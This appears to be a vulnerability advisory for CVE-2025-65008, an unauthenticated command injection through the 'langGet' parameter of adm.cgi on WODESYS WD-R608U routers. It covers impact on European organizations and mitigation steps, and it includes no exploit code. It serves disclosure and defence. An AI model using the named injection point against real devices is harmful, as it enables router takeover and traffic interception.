CVE-2025-65008 is an OS command injection vulnerability classified under CWE-78 affecting the WODESYS WD-R608U router series, including models WDR122B V2.0 and WDR28. The vulnerability stems from inadequate input validation of the 'langGet' parameter in the adm.cgi web management interface. This flaw allows an unauthenticated remote attacker to inject and execute arbitrary shell commands on the underlying operating system. The vulnerability was confirmed in firmware version WDR28081123OV1.01; however, other versions have not been tested and may also be vulnerable. The attack vector requires only network access to the router's management interface, with no authentication or user interaction needed, making exploitation straightforward. The CVSS 4.0 base score of 9.4 reflects the critical nature of this vulnerability, with high impact on confidentiality, integrity, and availability. The vendor has been notified but has not provided detailed information or patches. No public exploits have been observed yet, but the severity and ease of exploitation make this a significant threat. The vulnerability could allow attackers to gain full control over the device, manipulate network traffic, intercept sensitive data, or use the router as a pivot point for further attacks within an organization’s network.

For European organizations, exploitation of CVE-2025-65008 could lead to severe consequences including unauthorized access to internal networks, interception or manipulation of sensitive communications, and disruption of network services. Given that routers are critical network infrastructure components, compromise could result in widespread operational outages and data breaches. Industrial, governmental, and enterprise sectors relying on WODESYS routers for connectivity or control systems are particularly vulnerable. The ability to execute arbitrary commands without authentication increases the risk of rapid and stealthy compromise. Additionally, attackers could deploy persistent backdoors or malware, facilitating long-term espionage or sabotage. The lack of available patches exacerbates the risk, necessitating immediate defensive actions. The threat also extends to supply chain security if these routers are used in managed service provider environments or critical infrastructure networks across Europe.

1. Immediately isolate affected WODESYS WD-R608U devices from untrusted networks, especially the internet, to prevent remote exploitation. 2. Restrict access to the adm.cgi management interface using network segmentation, firewall rules, or VPNs limited to trusted administrators. 3. Implement strict ingress filtering and monitor network traffic for unusual requests targeting the 'langGet' parameter or adm.cgi endpoint. 4. Conduct thorough inventory and version verification of all WODESYS routers in use to identify potentially vulnerable devices. 5. Engage with WODESYS vendor support channels for updates or patches, and subscribe to security advisories for timely information. 6. Consider deploying host-based or network-based intrusion detection systems (IDS) with signatures or heuristics for OS command injection attempts. 7. If possible, replace vulnerable devices with alternative hardware or firmware versions confirmed to be secure. 8. Establish incident response plans specifically addressing router compromise scenarios, including forensic data collection and recovery procedures. 9. Educate network administrators on the risks and signs of exploitation related to this vulnerability. 10. Regularly back up router configurations and critical network data to enable rapid restoration after an incident.